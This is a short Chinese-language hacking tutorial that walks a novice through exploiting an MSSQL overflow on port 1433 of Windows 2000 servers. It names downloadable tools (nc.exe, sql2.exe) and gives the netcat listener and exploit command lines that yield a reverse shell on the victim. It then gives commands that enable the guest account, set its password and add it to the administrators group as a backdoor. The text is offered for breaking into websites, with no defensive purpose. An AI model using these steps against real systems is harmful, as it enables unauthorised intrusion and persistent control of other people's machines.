数据库端口 1433的溢出攻击

在win2000机器上装了mssql的话，机器就会开1433端口。什么是端口，就像食堂买菜的窗口一样，你买白菜上1号窗，买西红柿上2号窗。在机器上买mssql就上1433窗。

　　溢出1433需要两个工具:nc.exe和sql2.exe，在www.sandflee.net都有下载。进攻方法就两步：

　　第一步，在自己机器上开一个cmd窗口。对了，你要用win2000的话，就开始－运行－写入cmd回车。这里我们只用2000，不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话，就在你开的这个窗口下打入命令c:>nc -l -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。

　　第二步：再在开始－运行－写入cmd回车，再开一个窗口。在这个窗口写命令行c:>sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。这里要作点说明：如何得到入侵网站ip?在cmd下c:>ping www.xxxxx.com就可以看到了。自己的ip呢？在cmd下c:>ipconfig就可以看到了。其中命令行中的40你可以随意改成别的，但好像40和53成功率高一点。再是命令中的0不行的话，你就试试1或2。如果入侵网站有这个漏洞话，那么你开的第一个窗口就会变成肉鸡的c:/winnt/system32>.就是说，你已经进入它的机器里了。进去以后，你可以填加个用户了。net user guest /active:yes用这个命令，就将默认禁止的guest用户激活。net user guest 123456这样guest的密码变成123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。